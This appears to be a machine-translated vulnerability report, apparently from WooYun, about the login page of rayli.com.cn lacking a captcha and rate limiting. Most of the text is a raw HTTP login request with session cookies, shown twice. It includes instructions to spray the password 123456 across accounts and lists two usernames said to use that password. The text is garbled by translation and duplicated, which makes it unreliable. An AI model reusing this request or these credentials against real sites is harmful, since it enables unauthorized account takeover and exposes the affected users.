Database hit caused by improper design of the primary site of Ruili Network
Database hit caused by improper design of the primary site of Ruili Network
Http://www.rayli.com.cn/
No verification code, no limit on the number of times
POST/apsaradb for member. php HTTP/1.1
Host: user.rayli.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 42.0) Gecko/20100101 Firefox/42.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: zh-CN, zh; q = 0.8, en-US; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Referer: http://www.rayli.com.cn/
Cookie: qp_index = 1; _ utma = Hangzhou; _ utmz = 42853434.1449725096.3.3.utmcsr = wooyun.org | utmccn = (referral) | utmcmd = referral | utmcct =/corps/% E7 % 91% 9E % E4 % B8 % BD; fingerprint = 1449707740; EqNd_95b1_sid = jjFdjm; EqNd_95b1_lastact = 1449725430% 09home. php % 09; _ utma = upper; _ utmz = Lower = rayli.com.cn | utmccn = (referral) | utmcmd = referral | utmcct =/; lower = 1449725143,1449725156, lower; response = % 7B % 22 connectState % 22% 3A2% 2C % 22 oneLineStorySetting % 22% 3A3% 2C % 22 Response storysetting % 22% 3A3% 2C % 22 Response auth % 22% 3 Anull % 7D; bytes = 0; EqNd_95b1_home_readfeed = 1449725430; _ utmc = 42853434; _ ga = bytes; _ utmb = bytes; _ utmt = 1; BIGipServerpool_spaceweb = 2464302138.20480.0000; _ utmb = 118104717.6.10.1449725143; _ utmc = 118104717; _ utmt_user_rayli.com.cn = 1; Hm_lpvt_e539570110b6589ee4039ba0d964204e = 1449725406
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
Mod = logging & action = login & loginsubmit = yes & back_url = http % 3A % 2F % 2Fwww.rayli.com.cn % 2F & username = admin & password = 123456
If you run it all, the passwords that hit the database are all 123456.
Log on to the console.
Liujing 123456
Liuli 123456
Http://www.rayli.com.cn/
No verification code, no limit on the number of times
POST/apsaradb for member. php HTTP/1.1
Host: user.rayli.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 42.0) Gecko/20100101 Firefox/42.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: zh-CN, zh; q = 0.8, en-US; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Referer: http://www.rayli.com.cn/
Cookie: qp_index = 1; _ utma = Hangzhou; _ utmz = 42853434.1449725096.3.3.utmcsr = wooyun.org | utmccn = (referral) | utmcmd = referral | utmcct =/corps/% E7 % 91% 9E % E4 % B8 % BD; fingerprint = 1449707740; EqNd_95b1_sid = jjFdjm; EqNd_95b1_lastact = 1449725430% 09home. php % 09; _ utma = upper; _ utmz = Lower = rayli.com.cn | utmccn = (referral) | utmcmd = referral | utmcct =/; lower = 1449725143,1449725156, lower; response = % 7B % 22 connectState % 22% 3A2% 2C % 22 oneLineStorySetting % 22% 3A3% 2C % 22 Response storysetting % 22% 3A3% 2C % 22 Response auth % 22% 3 Anull % 7D; bytes = 0; EqNd_95b1_home_readfeed = 1449725430; _ utmc = 42853434; _ ga = bytes; _ utmb = bytes; _ utmt = 1; BIGipServerpool_spaceweb = 2464302138.20480.0000; _ utmb = 118104717.6.10.1449725143; _ utmc = 118104717; _ utmt_user_rayli.com.cn = 1; Hm_lpvt_e539570110b6589ee4039ba0d964204e = 1449725406
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
Mod = logging & action = login & loginsubmit = yes & back_url = http % 3A % 2F % 2Fwww.rayli.com.cn % 2F & username = admin & password = 123456
If you run it all, the passwords that hit the database are all 123456.
Log on to the console.
Liujing 123456
Liuli 123456
Solution:
You are more professional than me.